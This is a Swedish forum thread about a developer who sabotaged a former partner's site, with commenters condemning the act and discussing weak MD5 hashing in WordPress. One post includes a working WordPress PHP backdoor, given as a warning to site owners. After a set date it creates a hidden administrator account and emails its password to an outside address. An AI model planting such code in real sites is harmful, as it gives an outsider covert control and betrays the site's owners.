Läs igen så ser du att det inte handlar om någon kund. Jag drev en projekt tillsammans med en sk. vän, när pengar rullade in så stängde han ut mig (böt inlogg till webhotell, ftp, databas m.m) och tog allt mitt arbete. Han var ansvarig för administrativa uppgifter, och jag det tekniska. Om det var en kund så skulle jag givetvis behandlat situationen annorlunda. Avtal fanns inte då jag var ung och dum, inte en susning om att det skulle gå så bra som det gjorde och det faktum att det var en bra vän, blåögd som man är. ;)

Att förstöra är ändå inte OK, du tar lagen i egna händer i stället för att driva det rättsligt som man ska göra.

Jag vet inte hur ert avtal ser ut så jag kan inte säga exakt vad som ska ske, kanske du ska anmäla honom för stöld, eller dataintrång, vad vet jag. Allt beror på avtal, bolagsform, teckningsrätt och era handlingar mot varandra, det kan vara komplicerat.

Jag tycker det är viktigt att alltid agera fullt legitimt och korrekt även om motparten inte gör det, om du ska ha framgång i en förhandling eller rättsprocess så måste du själv sköta dina kort enligt konstens alla regler, annars förstör du bara för dig själv.

Min fetmarkering.

Går ju att tolka på olika vis. I mina ögon är de oerhört oprofessionellt och om jag var du skulle jag genast byta konsult till en annan.. Känns oerhört oseriöst!

Jag skulle inte känna mig trygg om någon gjorde något liknande mot mig.

Jag skulle även passa på att byta hash-funktion från MD5 till något bättre. Men det fixar förhoppningsvis nästa utvecklare åt dig.

Jag skulle bryta direkt.

Dock för att han inte vet vad MYSQL update är :)

Utan att ha gjort en undersökning tror jag att minst 99% av alla Wordpress-installationer kör md5 eftersom det är standard. Visst kan man modda detta men det känns rätt sällsynt och då får man se till att inget bryts vid framtida uppdateringar av core-filerna.

Bättre lägga energin på att få förändringen av hashfunktionen inbyggt i Wordpress direkt isf.

Missade att detta rörde utveckling i Wordpress.

När ni köper tid av paranoida WP-utvecklare finns det en metod som liknar vad som TS visade upp, att hålla koll på. Här är ett övertydligt exempel som väntar in att ett datum ska passeras. När datumet passeras skapas en adminanvändare automatiskt och ett mail går ut till "hackaren".

if ( strtotime( "2012-03-15" ) < time() ) {
require_once( ABSPATH . WPINC . '/registration.php' );
if ( !username_exists( 'the-secret-backdoor' ) ) {
add_action( 'shutdown', 'backdoor_create_new_admin' );
function backdoor_create_new_admin() {
$user_id = wp_insert_user( array(
'user_login' => 'the-secret-backdoor',
'user_pass' => 'thesecretpassword1337haxxors',
'user_email' => '[email protected]',
'role' => 'administrator'
) );
wp_mail( '[email protected]', 'New Admin account is ready', 'WP - '.get_bloginfo( 'wpurl' ).' | username: the-secret-backdoor | password: thesecretpassword1337haxxors' );
} } }

Jag kan tänka mig att detta kan maskeras väl med massa includes..

Detta handlar inte om wp utan OpenCart!
Och i grunden handlar det mest om konsulter "får" göra såhär..